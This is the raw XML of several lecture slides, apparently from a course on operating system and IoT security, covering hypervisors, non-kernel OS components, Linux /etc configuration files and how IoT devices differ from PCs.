      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253342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Hypervisors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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04158855-CC7D-8441-B8CC-64156C86E399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8242282" y="1182621"/>
            <a:ext cx="3692418" cy="2783737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{587717F8-0F27-8F43-8B4F-264D681236AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265472" y="1598323"/>
            <a:ext cx="7976810" cy="49005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sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Powerful processors may use hypervisors which host operating systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This provides several benefits:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can run several operating systems which run different programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can better isolate functionality.  Hypervisors are comparatively simple and so it’s easier to assure complete isolation between adversarial programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hypervisors provide a simple unit or program distribution.  You can bundle the OS, it’s configuration, applications and networking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Often, you can obtain better processor utilization.  That’s exactly what Amazon did with EC2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="715417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983"/>
            <a:ext cx="12192000" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Non-kernel components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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E7085B-876A-B146-9AA5-C9237F5A9EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233017" y="1492659"/>
            <a:ext cx="11556731" cy="52281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sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The OS has many non-kernel components.  This includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Daemons:  These are programs that the kernel starts right after boot.  They provide complex functions like implementing printer queues or high-level network functions, anti-virus protection, network file system access. There are many tens of these started on Linux. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Utilities: Standard functions for making directories (mkdir), list files (ls), list active functions (ps), delete file (rm) rename files and directories (mv).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Libraries: Most operating systems come with many libraries to help make programming simple.  For example, standard access to system calls (glibc), math implementations (libm), implement some windowing functions (buttons, pull-down menus) and implement synchronization primitives (e.g.-mutexes).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Shells and UI:  Standard terminal implementations, visually appealing user interfaces (windowing systems and gadgets), higher level network interfaces (Berkeley sockets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Configuration control: Programs that add new authorized users (adduser), block or allow network connections on different ports with different protocols (ssh, …), interpose proxies on internet connections (iptables), perform updates, synchronize time with external time authority, adjust routing preferences or specify file or channel access rights.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240539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983"/>
            <a:ext cx="12009120" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configuration files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343590" y="1809690"/>
            <a:ext cx="11582400" cy="4449296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Configuration files tell the operating system and other applications what to allow and what to block.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>They affect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Starting service programs (daemons)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Many security problems are caused by improper configuration and can be prevented by proper configuration, as if anybody listens.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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="809062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 y="85679"/>
            <a:ext cx="11582400"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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474440" y="1893295"/>
            <a:ext cx="11582400" cy="4337161"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/passwd contains a list of authorized accounts and associated password information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> specifies what daemons run (possibly with root privilege)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Iptables specifies what IP addresses and ports can be accessed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Keychains contain secret keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The root key store contains a list of trusted public keys called root keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>File system permissions are encoded within the file systems. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>rwxrwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>).  People also use access control lists (ACLs) and capabilities to manage authorization.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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4175496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546" y="174194"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C7F039-BDA8-FE4C-8A35-74674A533CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620684" y="1668481"/>
            <a:ext cx="10370574" cy="43994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/etc/host.conf  -Tells the network domain server how to look up hostnames. (Normally /etc/hosts, then name server; it can be changed through netconf.)</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/etc/hosts - Contains a list of known hosts (in the local network). Can be used if the IP of the system is not dynamically generated. For simple hostname resolution (to dotted notation), /etc/hosts.conf normally tells the resolver to look here before asking the network nameserver, DNS or NIS.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/etc/hosts.allow  - Man page same as hosts_access. Read by tcpd at least</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/etc/hosts.deny  - Man page same as hosts_access. Read by tcpd at least.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/etc/rc.d/rc.sysinit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  - Normally the first script run for all run levels.</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/etc/fstab  - Lists the filesystems currently "mountable" by the computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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368842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Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1692911"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The hardware, software and protocol components of a powerful (e.g. - raspberry pi class) IoT device is very similar to that of our familiar PC ecosystem.  The OS’s are similar (Linux runs on both), the Internet interfaces are the same and hardware now includes protective mechanisms like MMU’s and TPMs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>There are differences: IoT devices are designed and maintained by smaller staffs and many of those writing software for IoT are hardware engineers unfamiliar with modern software practices.  There are many more IoT devices than “PCs” and, partly because of price, very little effort is expended on updating and maintenance.  Further, the interface to many of the “on board” hardware “peripherals” is far less standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Our point of view here is that you mostly know about PC’s and how they work including operating systems, applications, protocols and devices and we here focus on security critical differences and novel vulnerabilities.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3277067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546" y="72596"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C7F039-BDA8-FE4C-8A35-74674A533CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587432" y="1575754"/>
            <a:ext cx="11017135" cy="4663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/etc/gateway  - Optionally used by the routed daemon.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/etc/networks – Lists names and addresses of networks accessible from the network to which the machine is connected. Used by route command. Allows use of name for network.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/etc/protocols - Lists the currently available protocols.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/etc/resolv.conf - Tells the kernel which name server should be queried when a program asks to "resolve" an IP Address.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/etc/exports - The file system to be exported (NFS) and permissions for it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/etc/rpc - Contains instructions/rules for RPC.</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/etc/inetd.conf - Holds an entry for each network service for which inetd must control daemons or other servicers.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/etc/services - Holds an entry for each network service for which inetd must control daemons or other servicers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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86331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87" y="72596"/>
            <a:ext cx="11891133"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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C7F039-BDA8-FE4C-8A35-74674A533CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1593272"/>
            <a:ext cx="11582400" cy="45509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/etc/host.conf  -Tells the network domain server how to look up hostnames. (Normally /etc/hosts, then name server; it can be changed through netconf.)</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/etc/hosts - Contains a list of known hosts (in the local network). Can be used if the IP of the system is not dynamically generated. For simple hostname resolution (to dotted notation), /etc/hosts.conf normally tells the resolver to look here before asking the network nameserver, DNS or NIS. </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/etc/hosts.allow  - Man page same as hosts_access. Read by tcpd at least</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/etc/hosts.deny  - Man page same as hosts_access. Read by tcpd at least.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/etc/rc.d/rc.sysinit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  - Normally the first script run for all run levels.</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/etc/mtab  - .</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/etc/fstab  - Lists the filesystems currently "mountable" by the computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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146557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Logs</a:t>
            </a:r>
          </a:p>
